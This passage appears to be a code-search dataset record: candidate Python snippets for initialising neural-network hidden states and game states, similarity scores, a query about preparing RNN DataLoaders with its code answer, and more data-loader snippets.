BitVec_Prop( frozenset() )\n self.kill = BitVec_Prop( frozenset() )", "def init_hidden(self, batch_size):\n b = 2 if self.bidirectional else 1\n if self.rnn_type == \"LSTM\":\n h0 = (Variable(torch.zeros(b, batch_size, self.hidden_size)),\n Variable(torch.zeros(b, batch_size, self.hidden_size)))\n h0 = [h0[0].cuda(), h0[1].cuda()] if self.use_cuda else h0\n else:\n h0 = Variable(torch.zeros(b, batch_size, self.hidden_size))\n h0 = h0.cuda() if self.use_cuda else h0\n return h0", "def initial_state(self):\n h_0 = tf.zeros([1, self._num_units], self._dtype)\n context_0 = self._compute_context(h_0)\n h_0 = context_0 * 0\n\n if self._dec_init_states is None:\n batch_size = tf.shape(self._memory)[0]\n cell_states = self._cell.zero_state(batch_size, self._dtype)\n else:\n cell_states = self._dec_init_states\n\n attn_state_0 = AttnState(cell_states, h_0, context_0)\n\n return attn_state_0", "def reset_hidden(hidden, mask):\n if len(mask) != 0:\n hidden[:, mask, :] = 0\n \n return hidden", "def __init__(self, init_state):\n self._curr_state = init_state", "def set_zero_vector(self):\n self.vector = np.zeros(self.dimension, dtype = float)", "def __init__(self, state_0):\n self.state = state_0\n self.s_dot = 0\n self.hist = []\n self.time = 0.0\n control_frequency = 200 # Hz for attitude control loop\n self.dt = 1.0 / control_frequency\n self.desired_state = 0", "def _init_state(self, init_state=None, init_cov=None): \n ## Initialize the BMI state, assuming \n nS = self.n_states \n if init_state == None: \n init_state = np.mat( np.zeros([nS, 1]) ) \n if self.include_offset: init_state[-1,0] = 1 \n if init_cov == None: \n init_cov = np.mat( np.zeros([nS, nS]) )\n self.state = bmi.GaussianState(init_state, init_cov)", "def reset_reservoir(self):\n self.state = np.zeros((self.state_size,1),dtype=self.typefloat)", "def init_hidden(self, batch_size, device):\n if self.mode == 'LSTM':\n return (torch.ones((1+self.bidirectional , batch_size, self.hidden_dim), device=device),\n torch.ones((1+self.bidirectional, batch_size, self.hidden_dim), device=device))\n else:\n return torch.ones((1+self.bidirectional, batch_size, self.hidden_dim), device=device)", "def reset_states(self):\n K.batch_set_value([(v, 0) for v in self.variables])", "def init_hidden(self, mini_batch_size):\n self.hidden = Variable(torch.zeros(1, mini_batch_size, 200))\n if torch.cuda.is_available():\n self.hidden = self.hidden.cuda()", "def init_hidden(self, mini_batch_size):\n self.hidden = Variable(torch.zeros(1, mini_batch_size, 200))\n if torch.cuda.is_available():\n self.hidden = self.hidden.cuda()", "def init_hidden(self, mini_batch_size):\n self.hidden = Variable(torch.zeros(1, mini_batch_size, 200))\n if torch.cuda.is_available():\n self.hidden = self.hidden.cuda()", "def init_hidden(self, mini_batch_size):\n self.hidden = Variable(torch.zeros(1, mini_batch_size, 200))\n if torch.cuda.is_available():\n self.hidden = self.hidden.cuda()", "def init_hidden(self, mini_batch_size):\n self.hidden = Variable(torch.zeros(1, mini_batch_size, 200))\n if torch.cuda.is_available():\n self.hidden = self.hidden.cuda()", "def init_hidden(self, mini_batch_size):\n self.hidden = Variable(torch.zeros(1, mini_batch_size, 200))\n if torch.cuda.is_available():\n self.hidden = self.hidden.cuda()", "def init_hidden(self, mini_batch_size):\n self.hidden = Variable(torch.zeros(1, mini_batch_size, 200))\n if torch.cuda.is_available():\n self.hidden = self.hidden.cuda()", "def init_hidden(self, mini_batch_size):\n self.hidden = Variable(torch.zeros(1, mini_batch_size, 200))\n if torch.cuda.is_available():\n self.hidden = self.hidden.cuda()", "def initialize(self):\n\n for i, item in enumerate(self.v.items()):\n state, value = item\n if value == None:\n raise ValueError, \"state '%s' has no value\" % state\n self.S[i]=value\n self.storage=Storage()", "def init_hidden(self, batch=constants.BATCH_SIZE):\n\n return (Variable(torch.randn(constants.NUM_LAYERS * constants.NUM_DIRECTIONS, batch, self.hidden_dim)),\n Variable(torch.randn(constants.NUM_LAYERS * constants.NUM_DIRECTIONS, batch, self.hidden_dim)))", "def init_hidden(self, batch_size):\n return (\n autograd.Variable(\n torch.rand(2, batch_size, self.hidden_dim) * 2 * 0.08\n ), # https://github.com/xthan/polyvore/blob/master/polyvore/polyvore_model_bi.py#L55\n autograd.Variable(\n torch.rand(2, batch_size, self.hidden_dim) * 2 * 0.08))\n \"\"\"\n return (autograd.Variable(torch.randn(2, batch_size, self.hidden_dim)),\n autograd.Variable(torch.randn(2, batch_size, self.hidden_dim)))\n \"\"\"", "def initialize_state(self, state):\n print 'state initialized'\n return state", "def __init__(self, state):\n super().__init__()\n\n #store the list and the number of rows and columns\n self.state = state\n newMat = np.array(state)\n dim = newMat.shape\n self.__columns = dim[1]\n self.__rows = dim[0]", "def init_hidden(self, batch_size):\n return (torch.zeros(1,batch_size,self.hidden_dim).to(self.device),\n torch.zeros(1,batch_size,self.hidden_dim).to(self.device))", "def init_hidden(self, batch_size):\n return (torch.zeros(1,batch_size,self.hidden_dim).to(self.device),\n torch.zeros(1,batch_size,self.hidden_dim).to(self.device))", "def initial_state(self):\n return 0", "def initial_state():\r\n return [[EMPTY, EMPTY, EMPTY],\r\n [EMPTY, EMPTY, EMPTY],\r\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\r\n return [[EMPTY, EMPTY, EMPTY],\r\n [EMPTY, EMPTY, EMPTY],\r\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n\treturn [[EMPTY, EMPTY, EMPTY],\n\t\t\t[EMPTY, EMPTY, EMPTY],\n\t\t\t[EMPTY, EMPTY, EMPTY]]", "def __init__(self):\n self.action_space = [(0,0)] + list(permutations([i for i in range(m)], 2))\n self.state_space = [(X,T,D) for X in range(m) for T in range(t) for D in range(d)]\n self.state_init = random.choice(self.state_space)\n\n # Start the first round\n self.reset()", "def init_dense(self, layer):\n pass", "def __init__(self):\n self.state_dim = 12\n self.measurement_dim = 6", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def _init_state(self, encoder_hidden):\n if encoder_hidden is None:\n return None\n if isinstance(encoder_hidden, tuple):\n encoder_hidden = tuple([self._cat_directions(h) for h in encoder_hidden])\n else:\n encoder_hidden = self._cat_directions(encoder_hidden)\n return encoder_hidden", "def _init_state(self, encoder_hidden):\n if encoder_hidden is None:\n return None\n if isinstance(encoder_hidden, tuple):\n encoder_hidden = tuple([self._cat_directions(h) for h in encoder_hidden])\n else:\n encoder_hidden = self._cat_directions(encoder_hidden)\n return encoder_hidden", "def init_hidden_state(self, encoder_out):\n init_internal_state = []\n mean_encoder_out = encoder_out.mean(dim=1)\n h = self.init_h(mean_encoder_out)\n c = self.init_c(mean_encoder_out)\n init_internal_state.append((h, c))\n\n for i in range(1, self.decoder_number_layers):\n init_internal_state.append((\n Variable(torch.zeros(1, self.decoder_rnn_channels[i])).to(device),\n Variable(torch.zeros(1, self.decoder_rnn_channels[i])).to(device)\n ))\n return init_internal_state", "def __init__(self, hidden_size, eps=1e-12):\n super(MaskTransLayerNorm, self).__init__()\n\n self.gamma = nn.Parameter(torch.ones(hidden_size))\n self.beta = nn.Parameter(torch.zeros(hidden_size))\n self.variance_epsilon = eps", "def __init__(self, hidden_size):\n self.hidden_size = hidden_size", "def __init__(self, init_state):\n\n self.PUZZLE_TYPE = len(init_state) - 1\n self.initial_state = init_state\n self.current_state = init_state\n self.goal_state = [i for i in range(0, self.PUZZLE_TYPE + 1)]\n self.explored_states = []", "def init_hidden(self):\n\n weight = next(self.parameters()).data\n return Variable(weight.new(self.layers, self.batch_size, self.hidden_size).zero_())", "def init_game_setting(self):\n ##################\n # YOUR CODE HERE #\n ##################\n self.state = np.zeros((1, 80, 80))\n self.clear_action()" ]
[ "0.78422564", "0.76011795", "0.75708747", "0.7545913", "0.7402229", "0.7300602", "0.7254794", "0.69414794", "0.69414794", "0.69055253", "0.6872069", "0.68429536", "0.6835688", "0.67922854", "0.6773605", "0.6763473", "0.6744704", "0.67300737", "0.667231", "0.66509145", "0.66509145", "0.66509145", "0.6597272", "0.6597272", "0.65397716", "0.65397716", "0.65352505", "0.651785", "0.6493418", "0.6493418", "0.64909154", "0.6449154", "0.6446776", "0.6410173", "0.6405012", "0.6403049", "0.6395393", "0.63930243", "0.6366728", "0.6354577", "0.632665", "0.63251895", "0.6318795", "0.63147736", "0.6312861", "0.6312861", "0.6312861", "0.6312861", "0.6312861", "0.6312861", "0.6312861", "0.6312861", "0.627812", "0.6265179", "0.62457436", "0.6232031", "0.62292033", "0.6228181", "0.6228181", "0.6227047", "0.6225542", "0.6225542", "0.62224287", "0.62182564", "0.62140447", "0.61998147", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184091", "0.6184091", "0.6178622", "0.6161697", "0.6153397", "0.615223", "0.61469287", "0.61459595" ]
0.0
-1
Prepares DataLoaders for 'rnn' generation method
def prepare_dataloaders(data, seq_len, batch_size=64, validation_set=False, validation_size=0.1, random_seed=42): vocab = set(data) token2id = {k: v for v, k in enumerate(vocab)} id2token = {k: v for v, k in token2id.items()} data_range = range(0, len(data) - seq_len, seq_len) data = [token2id[t] for t in data] data = np.array([data[i:i + seq_len] for i in data_range]) tensor_data = torch.from_numpy(data) if validation_set: np.random.seed(random_seed) idx = np.random.choice( range(len(tensor_data)), size=len(tensor_data), replace=False) split = int(len(idx) * (1 - validation_size)) train_idx = idx[:split] valid_idx = idx[split:] train_data = TensorDataset(torch.LongTensor(tensor_data[train_idx])) valid_data = TensorDataset(torch.LongTensor(tensor_data[valid_idx])) train_loader = DataLoader( train_data, shuffle=True, batch_size=batch_size) valid_loader = DataLoader( valid_data, shuffle=True, batch_size=batch_size) return train_loader, valid_loader, vocab, token2id, id2token else: train_data = TensorDataset(torch.LongTensor(tensor_data)) train_loader = DataLoader( train_data, shuffle=True, batch_size=batch_size) return train_loader, vocab, token2id, id2token
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_each_loader(data_path, batch_size, trn_negnum, shuffle=True, num_workers=0):\n \n dataset = ML_Dataset(data_path, trn_negnum)\n \n if data_path.endswith('trn') == True:\n collate = dataset.train_collate\n else:\n collate = test_collate\n\n data_loader = data.DataLoader(dataset=dataset,\n batch_size=batch_size,\n shuffle=shuffle,\n num_workers=num_workers,\n collate_fn=collate)\n\n return data_loader", "def prepare(self):\n bcolz.set_nthreads(2)\n\n # step 0: load only when not loaded yet\n if TRAINING in self.data and VALIDATION in self.data: return\n\n # step 1: load the file names\n patients = sorted(glob.glob(self.location+'/*.*/'))\n print len(patients), \"patients\"\n\n # step 1: load the file names\n # make a stratified validation set\n # note, the seed decides the validation set, but it is deterministic in the names\n random.seed(317070)\n patient_names = [self.patient_name_from_file_name(f) for f in patients]\n validation_patients = random.sample(patient_names, int(VALIDATION_SET_SIZE*len(patient_names)))\n\n labels_as_dict = defaultdict(list)\n\n with open(paths.LUNA_LABELS_PATH, 'rb') as csvfile:\n reader = csv.reader(csvfile, delimiter=',', quotechar='|')\n next(reader) # skip the header\n for row in reader:\n label = (float(row[1]), float(row[2]), float(row[3]), float(row[4]))\n labels_as_dict[str(row[0])].append(label)\n\n # make the static data empty\n for s in self.datasets:\n self.data[s] = []\n self.labels[s] = []\n self.names[s] = []\n self.spacings[s] = []\n self.origins[s] = []\n\n with gzip.open(paths.INTERMEDIATE_DATA_PATH + 'spacings.pkl.gz') as f:\n spacings = cPickle.load(f)\n\n with gzip.open(paths.INTERMEDIATE_DATA_PATH + 'origins.pkl.gz') as f:\n origins = cPickle.load(f)\n\n # load the filenames and put into the right dataset\n for i, patient_folder in enumerate(patients):\n patient_id = str(patient_folder.split(path.sep)[-2])\n if patient_id in validation_patients:\n dataset = VALIDATION\n else:\n dataset = TRAIN\n\n\n label = labels_as_dict[patient_id]\n if self.only_positive and not label:\n continue\n\n self.data[dataset].append(patient_folder)\n self.labels[dataset].append(label)\n self.names[dataset].append(patient_id)\n self.spacings[dataset].append(spacings[patient_id])\n self.origins[dataset].append(origins[patient_id])\n\n # give every patient a unique number\n last_index = -1\n for set in self.datasets:\n self.indices[set] = range(last_index+1,last_index+1+len(self.data[set]))\n if len(self.indices[set]) > 0:\n last_index = self.indices[set][-1]\n print set, len(self.indices[set]), \"samples\"", "def _init_train_loader(self):\n # Choose the right dataset type\n if self.config_args[\"num_members\"] > 1:\n class_dataset_wrapper = dataset_wrapper.MixMoDataset\n else:\n class_dataset_wrapper = dataset_wrapper.MSDADataset\n\n # Load augmentations\n self.traindatasetwrapper = class_dataset_wrapper(\n dataset=self.train_dataset,\n num_classes=int(self.config_args[\"data\"][\"num_classes\"]),\n num_members=self.config_args[\"num_members\"],\n dict_config=self.config_args[\"training\"][\"dataset_wrapper\"],\n properties=self.properties\n )\n\n # Build standard sampler\n _train_sampler = torch.utils.data.sampler.RandomSampler(\n data_source=self.traindatasetwrapper, ## only needed for its length\n num_samples=None,\n replacement=False,\n )\n\n # Wrap it with the repeating sampler used for multi-input models\n batch_sampler = batch_repetition_sampler.BatchRepetitionSampler(\n sampler=_train_sampler,\n batch_size=self.batch_size,\n num_members=self.config_args[\"num_members\"],\n drop_last=True,\n config_batch_sampler=self.config_args[\"training\"][\"batch_sampler\"]\n )\n\n self.train_loader = torch.utils.data.DataLoader(\n self.traindatasetwrapper,\n batch_sampler=batch_sampler,\n num_workers=self.num_workers,\n batch_size=1,\n shuffle=False,\n sampler=None,\n drop_last=False,\n pin_memory=True,\n )", "def prepare(self):\n\n # step 0: load only when not loaded yet\n if TRAINING in self.data \\\n and VALIDATION in self.data:\n return\n\n # step 1: load the file names\n file_list = sorted(glob.glob(self.location+\"*.mhd\"))\n # count the number of data points\n\n # make a stratified validation set\n # note, the seed decides the validation set, but it is deterministic in the names\n random.seed(317070)\n patient_names = [self.patient_name_from_file_name(f) for f in file_list]\n validation_patients = random.sample(patient_names, int(VALIDATION_SET_SIZE*len(patient_names)))\n\n # make the static data empty\n for s in self.datasets:\n self.data[s] = []\n self.labels[s] = []\n self.names[s] = []\n\n # load the filenames and put into the right dataset\n labels_as_dict = defaultdict(list)\n\n with open(paths.LUNA_LABELS_PATH, 'rb') as csvfile:\n reader = csv.reader(csvfile, delimiter=',', quotechar='|')\n next(reader) # skip the header\n for row in reader:\n label = (float(row[1]), float(row[2]), float(row[3]), float(row[4]))\n labels_as_dict[str(row[0])].append(label)\n\n for patient_file in file_list:\n patient_name = self.patient_name_from_file_name(patient_file)\n\n if patient_name in validation_patients:\n s = VALIDATION\n else:\n s = TRAINING\n label = labels_as_dict[str(patient_name)]\n if self.only_positive and not label:\n continue\n self.data[s].append(patient_file)\n \n if self.pick_nodule:\n self.labels[s].append([random.choice(label)]) \n else:\n self.labels[s].append(label)\n \n \n self.names[s].append(patient_name)\n\n # give every patient a unique number\n last_index = -1\n for s in self.datasets:\n self.indices[s] = range(last_index+1,last_index+1+len(self.data[s]))\n if len(self.indices[s]) > 0:\n last_index = self.indices[s][-1]\n print s, len(self.indices[s]), \"samples\"", "def prepare_data(self,d):\n train_loaders, train_iters = {}, {}\n unlabeled_loaders, unlabeled_iters = {}, {}\n for domain in opt.domains:\n #CONVERT TO FLOAT32\n features, target = torch.from_numpy(d[domain].X.todense().astype('float32')), torch.from_numpy(d[domain].y)#.reshape((-1,1))\n train = data_utils.TensorDataset(features,target)\n train_loaders[domain] = DataLoader(train, opt.batch_size, shuffle = True)\n train_iters[domain] = iter(train_loaders[domain])\n for domain in opt.unlabeled_domains:\n features, target = torch.from_numpy(d[domain].X.todense().astype('float32')), torch.from_numpy(d[domain].y)#.reshape(-1,1))\n uset = data_utils.TensorDataset(features,target)\n unlabeled_loaders[domain] = DataLoader(uset,opt.batch_size, shuffle = True)\n unlabeled_iters[domain] = iter(unlabeled_loaders[domain])\n \n return train_loaders, train_iters, unlabeled_loaders, unlabeled_iters", "def create_dataloaders(data_dir):\n\n trng_dataset = datasets.ImageFolder(data_dir / TRNG_FOLDER,\n transform=flowernet.trng_transform)\n trng_dataloader = torch.utils.data.DataLoader(trng_dataset,\n batch_size=64,\n shuffle=True)\n\n valn_dataset = datasets.ImageFolder(data_dir / VALN_FOLDER,\n transform=flowernet.pred_transform)\n valn_dataloader = torch.utils.data.DataLoader(valn_dataset,\n batch_size=64,\n shuffle=True)\n\n return trng_dataloader, valn_dataloader", "def build_training_data_loader(self) -> DataLoader:\n pass", "def _prepare_data(self):\n #TODO hardcoded values need to change\n print_info(\"Preprocessing the train data...\")\n self._place_dataset(os.path.join(self._hparams[\"temp-data\"], \"train\"),\n self.TRAIN_OUT_PATH)\n\n print_info(\"Preprocessing the test data...\")\n self._place_dataset(os.path.join(self._hparams[\"temp-data\"], \"test\"),\n self.TEST_OUT_PATH)\n\n print_info(\"Preprocessing the validation data...\")\n self._place_dataset(os.path.join(self._hparams[\"temp-data\"], \"val\"),\n self.VAL_OUT_PATH)", "def prepare_dataloader(opt, dataobj):\n\n def load_data(name):\n with open(name, 'rb') as f:\n data = pickle.load(f)\n num_types = 1 # There is no event type prediction, hence using a dummy value, this will basically be a constant value field\n return data, num_types\n\n print('[Info] Loading train data...')\n train_data, num_types = load_data(opt.data + 'train_ny.pkl')\n print('[Info] Loading dev data...')\n val_data, _ = load_data(opt.data + 'val_ny.pkl')\n print('[Info] Loading test data...')\n test_data, _ = load_data(opt.data + 'test_ny.pkl')\n\n trainloader = get_dataloader(train_data, opt.batch_size, shuffle=True)\n validationloader = get_dataloader(val_data, opt.batch_size, shuffle=True)\n testloader = get_dataloader(test_data, opt.batch_size, shuffle=False)\n return trainloader, validationloader, testloader, num_types", "def get_data_loaders(args, tokenizer):\n personachat = get_dataset(tokenizer, args.dataset_path, args.dataset_cache, args.train_lang)\n _ = personachat.pop(\"test\", None)\n logger.info(\"Build inputs and labels\")\n datasets = {\"train\": [], \"valid\": []}\n\n if args.train_lang in [\"En\", \"Fr\", \"It\", \"Id\", \"Jp\", \"Ko\", \"Zh\"]: #monolingual data\n for dataset_name, dataset in personachat.items():\n for dial in dataset[args.train_lang]: #dial: {\"persona\":[], \"history\":[], \"response\":str}\n instance = build_input_from_segments(dial[\"persona\"], dial[\"history\"][-args.max_turns:], dial[\"response\"], tokenizer, lm_labels = True)\n datasets[dataset_name].append(instance) \n else: #multilingual data\n for dataset_name, dataset in personachat.items():\n for lang, dials in dataset.items():\n for dial in dials: #dial: {\"persona\":[], \"history\":[], \"response\":str}\n instance = build_input_from_segments(dial[\"persona\"], dial[\"history\"][-args.max_turns:], dial[\"response\"], tokenizer, lang_id=\"<{}>\".format(lang.lower()), lm_labels = True)\n datasets[dataset_name].append(instance) #all langs together\n\n\n logger.info(\"Build train and validation dataloaders\")\n train_dataset = DatasetTrain(datasets[\"train\"])\n valid_dataset = DatasetTrain(datasets[\"valid\"])\n\n #logger.info(\"Build train and validation dataloaders\")\n #train_dataset, valid_dataset = TensorDataset(*tensor_datasets[\"train\"]), TensorDataset(*tensor_datasets[\"valid\"])\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset) if args.distributed else None\n valid_sampler = torch.utils.data.distributed.DistributedSampler(valid_dataset) if args.distributed else None\n train_loader = DataLoader(train_dataset, sampler=train_sampler, batch_size=args.train_batch_size, shuffle=(not args.distributed), collate_fn=collate_fn)\n valid_loader = DataLoader(valid_dataset, sampler=valid_sampler, batch_size=args.valid_batch_size, shuffle=False, collate_fn=collate_fn)\n\n # logger.info(\"Train dataset (Batch, Candidates, Seq length): {}\".format(train_dataset.tensors[0].shape))\n # #logger.info(\"Train dataset (Batch, Candidates, Seq length): {}\".format(train_dataset.tensors[1].shape))\n # logger.info(\"Valid dataset (Batch, Candidates, Seq length): {}\".format(valid_dataset.tensors[0].shape))\n logger.info(\"Train dataset length: {}\".format(len(train_dataset)))\n logger.info(\"Valid dataset length: {}\".format(len(valid_dataset)))\n return train_loader, valid_loader, train_sampler, valid_sampler", "def data_creator(config):\n train_dataset, val_dataset = LinearDataset(2, 5), LinearDataset(2, 5)\n train_loader = DataLoader(train_dataset, batch_size=config[\"batch_size\"])\n val_loader = DataLoader(val_dataset, batch_size=config[\"batch_size\"])\n return train_loader, val_loader", "def prepare_data():\n gennet.prepare_data('Resnet50')", "def prepare_data(self):\n data = self._get_dataset(self.hparams.dataset_path)\n label_encoder = data[\"label_encoder\"]\n del data[\"label_encoder\"]\n\n click.secho(\"Building inputs and labels.\", fg=\"yellow\")\n datasets = {\n \"train\": defaultdict(list),\n \"valid\": defaultdict(list),\n \"test\": defaultdict(list),\n }\n for dataset_name, dataset in data.items():\n for sample in dataset:\n instance = self.build_input(\n self.tokenizer, sample[\"text\"], label_encoder, sample[\"label\"]\n )\n for input_name, input_array in instance.items():\n datasets[dataset_name][input_name].append(input_array)\n\n click.secho(\"Padding inputs and building tensors.\", fg=\"yellow\")\n tensor_datasets = {\"train\": [], \"valid\": [], \"test\": []}\n for dataset_name, dataset in datasets.items():\n dataset = self.pad_dataset(dataset, padding=self.tokenizer.pad_index)\n for input_name in MODEL_INPUTS:\n if input_name == \"labels\":\n tensor = torch.tensor(dataset[input_name], dtype=torch.float32)\n else:\n tensor = torch.tensor(dataset[input_name])\n tensor_datasets[dataset_name].append(tensor)\n\n self.train_dataset = TensorDataset(*tensor_datasets[\"train\"])\n self.valid_dataset = TensorDataset(*tensor_datasets[\"valid\"])\n self.test_dataset = TensorDataset(*tensor_datasets[\"test\"])\n click.secho(\n \"Train dataset (Batch, Candidates, Seq length): {}\".format(\n self.train_dataset.tensors[0].shape\n ),\n fg=\"yellow\",\n )\n click.secho(\n \"Valid dataset (Batch, Candidates, Seq length): {}\".format(\n self.valid_dataset.tensors[0].shape\n ),\n fg=\"yellow\",\n )\n click.secho(\n \"Test dataset (Batch, Candidates, Seq length): {}\".format(\n self.test_dataset.tensors[0].shape\n ),\n fg=\"yellow\",\n )", "def init_loaders(self, *args, **kwargs):\n\n # Convert the data to Dataset\n dataset_dict = self.init_datasets(*args, **kwargs)\n\n # If the Dataset implements collate_fn, that is used. Otherwise, default_collate is used\n if hasattr(dataset_dict[\"train\"], \"collate_fn\") and callable(\n getattr(dataset_dict[\"train\"], \"collate_fn\")\n ):\n collate_fn = dataset_dict[\"train\"].collate_fn\n else:\n collate_fn = default_collate\n\n # If 'iters_per_epoch' is defined, then a fixed number of random sample batches from the training set\n # are drawn per epoch.\n # Otherwise, an epoch is defined by a full run through all of the data in the dataloader.\n #\n if self.config_dict.get(\"iters_per_epoch\") is not None:\n num_samples = (\n self.config_dict[\"iters_per_epoch\"] * self.config_dict[\"batch_size\"]\n )\n loaders_dict = {}\n for key in dataset_dict.keys():\n if key == \"train\":\n loaders_dict[key] = DataLoader(\n dataset_dict[key],\n batch_sampler=BatchSampler(\n RandomSampler(\n dataset_dict[key],\n replacement=True,\n num_samples=num_samples,\n ),\n batch_size=self.config_dict[\"batch_size\"],\n drop_last=False,\n ),\n collate_fn=collate_fn,\n )\n else:\n loaders_dict[key] = DataLoader(\n dataset_dict[key],\n batch_size=self.config_dict[\"batch_size\"],\n collate_fn=collate_fn,\n )\n else:\n loaders_dict = {\n key: DataLoader(\n dataset_dict[key],\n batch_size=self.config_dict[\"batch_size\"],\n collate_fn=collate_fn,\n )\n for key in data_dict.keys()\n }\n\n return loaders_dict", "def prepare(self):\n if self.opts['verbose']:\n print(\"Preparing dataset (one-time operation)...\")\n # Create paths files and load them back in\n self._build_ID_sets()\n self._create_ID_files()\n self._load_ID_files()\n if self.opts['verbose']:\n print(\"... done with preparing the dataset.\")", "def prep_data():\n loader = DLoader()\n cap = loader.visitor_cnt\n\n pass", "def dataloader(self):\n\n # load / split data\n train_data = self.data.get_train_data()\n if self.args.use_dev:\n train_data, dev_data = self.data.split_data(train_data)\n test_data = self.data.get_test_data()\n\n #print(train_data[0])\n #print(dev_data[0])\n #print(test_data[0])\n\n # build dataset\n train_dataset = self.loader.build_dataset(\n train_data, \n self.args.train_max_seq_len)\n train_loader = self.loader.build_dataloader(\n train_dataset, 'train')\n\n test_dataset = self.loader.build_dataset(\n test_data,\n self.args.eval_max_seq_len)\n test_loader = self.loader.build_dataloader(\n test_dataset, 'test')\n\n if self.args.use_dev:\n dev_dataset = self.loader.build_dataset(\n dev_data,\n self.args.eval_max_seq_len)\n dev_loader = self.loader.build_dataloader(\n dev_dataset, 'dev')\n return train_loader, dev_loader, test_loader\n else:\n return train_loader, test_loader", "def preload_all(self):\n for tp in self.tps:\n for f in self.featurefiles + self.maskfiles:\n file = os.path.join(tp, f)\n print('preloading {}'.format(file))\n self.load(file, lazy=False)", "def get_loader(config):\n train_transform = [T.Resize((256, 128)), T.RandomHorizontalFlip(), T.ToTensor(),\n T.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5])]\n train_transform = T.Compose(train_transform)\n\n test_transform = [T.Resize((256, 128)), T.ToTensor(),\n T.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5])]\n test_transform = T.Compose(test_transform)\n\n # Datasets.\n if config.source_dataset in ['duke'] and config.target_dataset in ['market']:\n source_image_dir = config.duke_image_dir\n target_image_dir = config.market_image_dir\n elif config.source_dataset in ['market'] and config.target_dataset in ['duke']:\n source_image_dir = config.market_image_dir\n target_image_dir = config.duke_image_dir\n else:\n assert 'Dataset not support!'\n source_set = ReidDataset(source_image_dir, train_transform)\n target_set = ReidDataset(target_image_dir, train_transform, config.expanding_cam)\n test_set = ReidDataset(source_image_dir, test_transform)\n\n # Dataloader.\n source_loader = data.DataLoader(dataset=source_set, batch_size=config.batch_size,\n num_workers=config.num_workers, shuffle=True, pin_memory=True, drop_last=True)\n\n target_loader = data.DataLoader(dataset=target_set, batch_size=config.batch_size,\n 